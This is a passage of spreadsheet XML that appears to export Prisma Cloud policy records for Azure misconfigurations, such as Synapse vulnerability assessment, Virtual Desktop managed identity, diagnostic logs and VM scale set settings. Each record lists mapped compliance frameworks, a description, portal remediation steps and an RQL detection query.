          <t>To configure vulnerability assessment for your existing Azure Synapse workspace, follow below steps:
1. Log in to Azure Portal and Navigate to Azure Synpase Analytics dashboard
2. Select the reported Synapse Workspace
3. Under Security, select Microsoft Defender for Cloud
4. Enable Defender for Cloud to configure vulnerability assessment for the selected Azure Synapse Workspace.
5 To configure vulnerability assessments to automatically run periodic scans, set Periodic recurring scans to On. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-46
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-46</t>
        </is>
      </c>
      <c r="Y2477" t="inlineStr"/>
      <c r="Z2477" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-synapse-workspace' AND json.rule = properties.provisioningState equal ignore case Succeeded as X; config from cloud.resource where api.name = 'azure-synapse-workspace-managed-sql-server-vulnerability-assessments' AND json.rule = properties.recurringScans.isEnabled is false as Y; filter '$.X.name equals $.Y.workspaceName'; show X;
{"category":"General","resourceTypes":["azurerm_synapse_workspace_vulnerability_assessment"]}</t>
        </is>
      </c>
      <c r="AA2477" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2477" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2477" t="inlineStr">
        <is>
          <t>PC-AZR-ASA-1061-CKV2_AZURE_46</t>
        </is>
      </c>
      <c r="AD2477" t="b">
        <v>1</v>
      </c>
      <c r="AE2477" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2477" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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7" t="inlineStr">
        <is>
          <t>f0f026d1-72ee-47dd-9543-53fe130f2471</t>
        </is>
      </c>
      <c r="AI2477" t="inlineStr">
        <is>
          <t>c1f0192d-713d-41d0-956e-1444947edd02</t>
        </is>
      </c>
      <c r="AJ2477" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2477" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2478">
      <c r="A2478" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, NIST SP 800-171 Revision 3, ITSG-33, ISO/IEC 27001:2022, ISO 27002:2022, Microsoft Cloud Security Benchmark v1, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), Insurance Regulatory And Development Authority Of India, TX-RAMP Level 1, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Sarbanes Oxley Act (SOX), CIS Controls v8, MLPS 2.0 (Level 2), ITSG-33, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, ISO 27002:2022, Copy of CIS Controls v8, New Zealand Information Security Manual (NZISM v3.4), Copy of ACSC Information Security Manual (ISM)-clone, Copy of New Zealand Information Security Manual (NZISM v3.4), NYDFS 23 CRR-NY 500.0, kfirdaus AWS Account-CS, NIST 800-53 Rev 5, CIS Controls v7.1, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Australian Energy Sector Cyber Security Framework (AESCSF)</t>
        </is>
      </c>
      <c r="B2478" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2478" s="2" t="inlineStr"/>
      <c r="D2478" t="inlineStr"/>
      <c r="E2478" t="inlineStr"/>
      <c r="F2478" t="inlineStr"/>
      <c r="G2478" t="b">
        <v>1</v>
      </c>
      <c r="H24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78" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2478" t="inlineStr">
        <is>
          <t>azure-virtual-desktop</t>
        </is>
      </c>
      <c r="K2478" t="inlineStr">
        <is>
          <t>Azure Virtual Desktop session host is not configured with managed identity</t>
        </is>
      </c>
      <c r="L2478" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2478" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2478" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2478" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2478" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2478" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2478" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S2478" t="inlineStr"/>
      <c r="T2478" t="b">
        <v>0</v>
      </c>
      <c r="U2478" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2478" t="inlineStr">
        <is>
          <t>azure-virtual-desktop-session-host</t>
        </is>
      </c>
      <c r="W2478" t="inlineStr">
        <is>
          <t>This policy identifies Virtual Desktop session hosts that are not configured with managed identity. Managed identity can be used to authenticate to any service that supports Azure AD authentication, without having credentials in your code. Storing credentials in a code increases the threat surface in case of exploitation and also managed identities eliminate the need for developers to manage credentials. So as a security best practice, it is recommended to have the managed identity to your Virtual Desktop session hosts.</t>
        </is>
      </c>
      <c r="X2478" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Navigate to Virtual machines dashboard
3. Click on the reported Virtual machine
4. Under Setting section, Click on 'Identity'
5. Configure either 'System assigned' or 'User assigned' managed identity based on your requirement.
6. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2478" t="inlineStr"/>
      <c r="Z2478" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-virtual-desktop-session-host' AND json.rule = session-hosts[*] is not empty and session-hosts[*].properties.resourceId exists as X; config from cloud.resource where api.name = 'azure-vm-list' AND json.rule = powerState equal ignore case "PowerState/running" as Y; filter '$.X.session-hosts[*].properties.resourceId equal ignore case $.Y.id and ($.Y.identity does not exist or $.Y.identity.type equal ignore case None)'; show Y;</t>
        </is>
      </c>
      <c r="AA2478" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2478" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2478" t="inlineStr">
        <is>
          <t>PC-AZR-AVD-881</t>
        </is>
      </c>
      <c r="AD2478" t="b">
        <v>1</v>
      </c>
      <c r="AE2478" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2478" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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78" t="inlineStr">
        <is>
          <t>f69095db-80d1-4ce4-a790-737dda95aa11</t>
        </is>
      </c>
      <c r="AI2478" t="inlineStr">
        <is>
          <t>6eb41fff-64e0-4671-8ff8-a94609fca7f3</t>
        </is>
      </c>
      <c r="AJ2478" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2478" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2479">
      <c r="A2479" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12</t>
        </is>
      </c>
      <c r="B2479" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2479" s="2" t="inlineStr"/>
      <c r="D2479" t="inlineStr"/>
      <c r="E2479" t="inlineStr"/>
      <c r="F2479" t="inlineStr"/>
      <c r="G2479" t="b">
        <v>1</v>
      </c>
      <c r="H24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79" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2479" t="inlineStr">
        <is>
          <t>azure-virtual-desktop</t>
        </is>
      </c>
      <c r="K2479" t="inlineStr">
        <is>
          <t>Azure Virtual Desktop workspace diagnostic log is disabled</t>
        </is>
      </c>
      <c r="L2479" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2479" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2479" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2479" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2479" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2479" t="inlineStr">
        <is>
          <t>A&amp;A</t>
        </is>
      </c>
      <c r="R2479" t="inlineStr">
        <is>
          <t>A&amp;A-03</t>
        </is>
      </c>
      <c r="S2479" t="inlineStr"/>
      <c r="T2479" t="b">
        <v>0</v>
      </c>
      <c r="U2479" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2479" t="inlineStr">
        <is>
          <t>azure-virtual-desktop-workspace</t>
        </is>
      </c>
      <c r="W2479" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Desktop workspaces where diagnostic logs are not enabled.
Diagnostic logs are vital for monitoring and troubleshooting Azure Virtual Desktop, which offers virtual desktops and remote app services. They help detect and resolve issues, optimize performance, and meet security and compliance standards. Without these logs, it’s difficult to track activities and detect anomalies, potentially jeopardizing security and efficiency.
As a best practice, it is recommended to enable diagnostic logs for Azure Virtual Desktop workspaces.</t>
        </is>
      </c>
      <c r="X2479" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal and search for 'Azure Virtual Desktop'
2. Select 'Azure Virtual Desktop'
3. Under 'Manage' select 'Workspaces'
4. Select the reported Workspace
5. Under 'Monitoring' select 'Diagnostic settings'
6. Under Diagnostic settings tab. Click on '+ Add diagnostic setting' to create a new Diagnostic Setting
7. Specify a 'Diagnostic settings name'
8. Under section 'Categories', select the type of log that you want to enable
9. Under section 'Destination details'
  a. If you select 'Send to Log Analytics', select the 'Subscription' and 'Log Analytics workspace'
  b. If you set 'Archive to storage account', select the 'Subscription' and 'Storage account'
  c. If you set 'Stream to an event hub', select the 'Subscription', 'Event hub namespace', 'Event hub name' and set the 'Event hub policy name'
10. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2479" t="inlineStr"/>
      <c r="Z2479" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' and api.name = 'azure-virtual-desktop-workspace' AND json.rule = diagnostic-settings[?none( properties.logs[?any( enabled is true )] exists )] exists</t>
        </is>
      </c>
      <c r="AA2479" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2479" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2479" t="inlineStr">
        <is>
          <t>PC-AZR-AVD-1276</t>
        </is>
      </c>
      <c r="AD2479" t="b">
        <v>1</v>
      </c>
      <c r="AE2479" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2479" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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79" t="inlineStr">
        <is>
          <t>eefe6708-a57e-4703-bb02-add1191e4466</t>
        </is>
      </c>
      <c r="AI2479" t="inlineStr">
        <is>
          <t>87f39972-8dc0-4b3d-a540-f9b73a687210</t>
        </is>
      </c>
      <c r="AJ2479" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2479" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2480">
      <c r="A2480" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, MLPS 2.0 (Level 2), CIS v2.0.0 (Azure) Level 1, APRA (CPS 234) Information Security, Azure Security Benchmark (v2), CIS v2.1.0 (Azure) Level 1, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, Azure Security Benchmark (v3), Copy of Azure Security Benchmark (v3), APRA (CPS 234) Information Security, CIS v1.3.0 (Azure), CIS v1.5.0 (Azure) - Level 1, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, Copy of New Zealand Information Security Manual (NZISM v3.4), CIS Controls v8, NIST CSF, SOC 2, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, kfirdaus AWS Account-CS, MTSBv2_Azure, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CIS v1.2.0 (Azure), APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST v.9.4.2 [Deprecated], CIS v1.4.0 (Azure), CIS Controls v8.1, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), Copy of CIS v1.2.0 (Azure), Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), NIST SP 800-171 Revision 2, CIS Controls v7.1, NIST SP 800-172, CSA CCM v.4.0.1, CIS v1.3.1 (Azure), CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2480" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2480" s="2" t="inlineStr"/>
      <c r="D2480" t="inlineStr"/>
      <c r="E2480" t="inlineStr"/>
      <c r="F2480" t="inlineStr"/>
      <c r="G2480" t="b">
        <v>0</v>
      </c>
      <c r="H24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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2480" t="inlineStr">
        <is>
          <t>azure-virtual-machine</t>
        </is>
      </c>
      <c r="K2480" t="inlineStr">
        <is>
          <t>Azure Virtual machine scale sets are not utilising Managed Disks</t>
        </is>
      </c>
      <c r="L2480" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2480" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2480" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2480" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2480" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2480" t="inlineStr">
        <is>
          <t>Virtual Machines</t>
        </is>
      </c>
      <c r="R2480" t="inlineStr">
        <is>
          <t>7.1</t>
        </is>
      </c>
      <c r="S2480" t="inlineStr"/>
      <c r="T2480" t="b">
        <v>0</v>
      </c>
      <c r="U2480" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2480" t="inlineStr">
        <is>
          <t>azure-virtual-machine-scale-set</t>
        </is>
      </c>
      <c r="W2480" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual machine scale sets which are not utilising Managed Disks. Using Azure Managed disk over traditional BLOB storage based VHD's has more advantage features like Managed disks are by default encrypted, reduces cost over storage accounts and more resilient as Microsoft will manage the disk storage and move around if underlying hardware goes faulty. It is recommended to move BLOB based VHD's to Managed Disks.</t>
        </is>
      </c>
      <c r="X2480" t="inlineStr">
        <is>
          <t>Currently migrating Virtual machine scale sets VHD disks to Azure Managed Disks is not available.
It is recommended that all new future scale sets be deployed with managed disks.
Follow steps given in the URL to create new Virtual machine Scale sets,
https://docs.microsoft.com/en-us/azure/virtual-machine-scale-sets/quick-create-portal</t>
        </is>
      </c>
      <c r="Y2480" t="inlineStr"/>
      <c r="Z2480" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-virtual-machine-scale-set' AND json.rule = properties.virtualMachineProfile.storageProfile.osDisk.vhdContainers exists</t>
        </is>
      </c>
      <c r="AA2480" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2480" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2480" t="inlineStr">
        <is>
          <t>PC-AZR-CMP-603</t>
        </is>
      </c>
      <c r="AD2480" t="b">
        <v>1</v>
      </c>
      <c r="AE2480" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2480" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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0" t="inlineStr">
        <is>
          <t>3596e236-1c20-4f3f-be6d-a513f0da63e1</t>
        </is>
      </c>
      <c r="AI2480" t="inlineStr">
        <is>
          <t>3ec883be-a22f-40d3-b295-acf66ffdd4c8</t>
        </is>
      </c>
      <c r="AJ2480" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2480" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2481">
      <c r="A2481" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, Sarbanes Oxley Act (SOX), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), PCI DSS v4.0, NIST CSF v2.0, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), ISO 27002:2022, NIST SP 800-172, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, PCI DSS v4.0, CSA CCM v.4.0.1, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, New Zealand Information Security Manual (NZISM v3.4), PCI DSS v3.2.1, CIS Controls v8, CSA CCM v.4.0.1, ISO/IEC 27017:2015, kfirdaus AWS Account-CS, CIS Controls v7.1, ISO/IEC 27001:2022, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), PCI DSS v4.0, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, CSA CCM v.4.0.6, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2022.2.1, Copy of CIS Controls v8, PCI DSS v4.0, CSA CCM v4.0.12, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST v.9.4.2 [Deprecated], CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, Copy of CIS Controls v8, CSA CCM v.4.0.1, PCI DSS v4.0, PCI DSS v4.0, CIS Controls v8, FFIEC, CSA CCM v.4.0.1, CIS Controls v8.1, CRI Profile v2.0, PCI DSS v4.0, CRI Profile v1.2.1, ISO 27002:2022, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, Copy of New Zealand Information Security Manual (NZISM v3.4), CIS Controls v7.1, ISO/IEC 27002:2013, PCI DSS v4.0, kfirdaus AWS Account-CS, NIST CSF, kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, PCI DSS v4.0, CRI Profile v1.2.1, CSA CCM v.4.0.6, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, FFIEC, CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, CSA CCM v.4.0.6, ISO/IEC 27001:2022, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v3.2.1, PCI DSS v4.0, NIST SP 800-172, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2)</t>
        </is>
      </c>
      <c r="B2481" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2481" s="2" t="inlineStr"/>
      <c r="D2481" t="inlineStr"/>
      <c r="E2481" t="inlineStr"/>
      <c r="F2481" t="inlineStr"/>
      <c r="G2481" t="b">
        <v>1</v>
      </c>
      <c r="H24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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2481" t="inlineStr">
        <is>
          <t>azure-virtual-machine</t>
        </is>
      </c>
      <c r="K2481" t="inlineStr">
        <is>
          <t>Azure Virtual Machine scale sets Boot Diagnostics Disabled</t>
        </is>
      </c>
      <c r="L2481" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2481" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2481" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2481" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2481" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2481" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2481" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2481" t="inlineStr"/>
      <c r="T2481" t="b">
        <v>0</v>
      </c>
      <c r="U2481" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2481" t="inlineStr">
        <is>
          <t>azure-virtual-machine-scale-set</t>
        </is>
      </c>
      <c r="W2481" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines scale sets which has Boot Diagnostics setting Disabled. Boot Diagnostics when enabled for virtual machine, captures Screenshot and Console Output during virtual machine startup. This would help in troubleshooting virtual machine when it enters a non-bootable state.</t>
        </is>
      </c>
      <c r="X2481" t="inlineStr">
        <is>
          <t>1. Log in to the Azure Portal
2. Select 'All services' from the left pane
3. Go to 'Compute' under 'Categories'
4. Select 'Virtual Machine scale sets'
5. Select the reported virtual machine scale sets
6. Click on 'Boot Diagnostics' under 'Support + troubleshooting'
7. Select 'On'
8. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2481" t="inlineStr"/>
      <c r="Z2481" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-virtual-machine-scale-set' AND json.rule = properties.virtualMachineProfile.diagnosticsProfile.bootDiagnostics.enabled is false</t>
        </is>
      </c>
      <c r="AA2481" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2481" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2481" t="inlineStr">
        <is>
          <t>PC-AZR-CMP-568</t>
        </is>
      </c>
      <c r="AD2481" t="b">
        <v>1</v>
      </c>
      <c r="AE2481" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2481" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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1" t="inlineStr">
        <is>
          <t>3ad45ee2-b88d-4cd3-a039-0844c5687fcd</t>
        </is>
      </c>
      <c r="AI2481" t="inlineStr">
        <is>
          <t>bd5452cc-dc1c-456a-a66f-be8b162dd4ea</t>
        </is>
      </c>
      <c r="AJ2481" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2481" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2482">
      <c r="A2482" t="inlineStr">
        <is>
          <t>MLPS 2.0</t>
        </is>
      </c>
      <c r="B2482" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2482" s="2" t="inlineStr"/>
      <c r="D2482" t="inlineStr"/>
      <c r="E2482" t="inlineStr"/>
      <c r="F2482" t="inlineStr"/>
      <c r="G2482" t="b">
        <v>0</v>
      </c>
      <c r="H24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82" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2482" t="inlineStr">
        <is>
          <t>azure-virtual-machine</t>
        </is>
      </c>
      <c r="K2482" t="inlineStr">
        <is>
          <t>tadenugba test policy 101</t>
        </is>
      </c>
      <c r="L2482" t="inlineStr"/>
      <c r="M2482" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2482" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2482" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2482" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2482" t="inlineStr">
        <is>
          <t>8.1.10</t>
        </is>
      </c>
      <c r="R2482" t="inlineStr">
        <is>
          <t>8.1.10.10</t>
        </is>
      </c>
      <c r="S2482" t="inlineStr">
        <is>
          <t>tadenugba_label</t>
        </is>
      </c>
      <c r="T2482" t="b">
        <v>0</v>
      </c>
      <c r="U2482" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2482" t="inlineStr">
        <is>
          <t>azure-virtual-machine-scale-set-vm</t>
        </is>
      </c>
      <c r="W2482" t="inlineStr"/>
      <c r="X2482" t="inlineStr"/>
      <c r="Y2482" t="inlineStr"/>
      <c r="Z2482" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-virtual-machine-scale-set-vm' AND json.rule = tags.aks-managed-poolName exists</t>
        </is>
      </c>
      <c r="AA2482" t="inlineStr">
        <is>
          <t>Tunde Adenugba</t>
        </is>
      </c>
      <c r="AB2482" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2482" t="inlineStr"/>
      <c r="AD2482" t="b">
        <v>0</v>
      </c>
      <c r="AE2482" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2482" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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82" t="inlineStr">
        <is>
          <t>b7ee3e06-ae9b-47a3-b8c0-7e623b9a51fe</t>
        </is>
      </c>
      <c r="AI2482" t="inlineStr">
        <is>
          <t>7044a89f-a23b-48f4-b1a1-492ec435f970</t>
        </is>
      </c>
      <c r="AJ2482" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2482" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2483">
      <c r="A2483" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B2483" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2483" s="2" t="inlineStr"/>
      <c r="D2483" t="inlineStr"/>
      <c r="E2483" t="inlineStr"/>
      <c r="F2483" t="inlineStr"/>
      <c r="G2483" t="b">
        <v>0</v>
      </c>
      <c r="H2483"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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2483" t="inlineStr">
        <is>
          <t>azure-virtual-machine</t>
        </is>
      </c>
      <c r="K2483" t="inlineStr">
        <is>
          <t>Azure AKS - 3 Days -  No Owner</t>
        </is>
      </c>
      <c r="L2483" t="inlineStr"/>
      <c r="M2483" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2483" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2483" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2483" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2483" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R2483" t="inlineStr">
        <is>
          <t>5.1.3 Config - Compute Resource with No Owner</t>
        </is>
      </c>
      <c r="S2483" t="inlineStr"/>
      <c r="T2483" t="b">
        <v>0</v>
      </c>
      <c r="U2483" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2483" t="inlineStr">
        <is>
          <t>azure-virtual-machine-scale-set-vm</t>
        </is>
      </c>
      <c r="W2483" t="inlineStr"/>
      <c r="X2483" t="inlineStr"/>
      <c r="Y2483" t="inlineStr"/>
      <c r="Z2483" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.service = 'Azure Compute' and api.name = 'azure-virtual-machine-scale-set-vm' AND json.rule = "_DateTime.ageInDays(instanceViewDetails.disks[0].statuses[0].time) &gt; 3 and tags.owner does not exist" addcolumn instanceViewDetails.disks[0].statuses[0].time</t>
        </is>
      </c>
      <c r="AA2483" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2483" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2483" t="inlineStr"/>
      <c r="AD2483" t="b">
        <v>0</v>
      </c>
      <c r="AE2483" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2483" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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3" t="inlineStr">
        <is>
          <t>11c3514a-98e0-4f61-bfcc-9fc7d7a5b8cb</t>
        </is>
      </c>
      <c r="AI2483" t="inlineStr">
        <is>
          <t>92ddcfc1-d869-4692-a33a-f782a454607c</t>
        </is>
      </c>
      <c r="AJ2483" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2483" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2484">
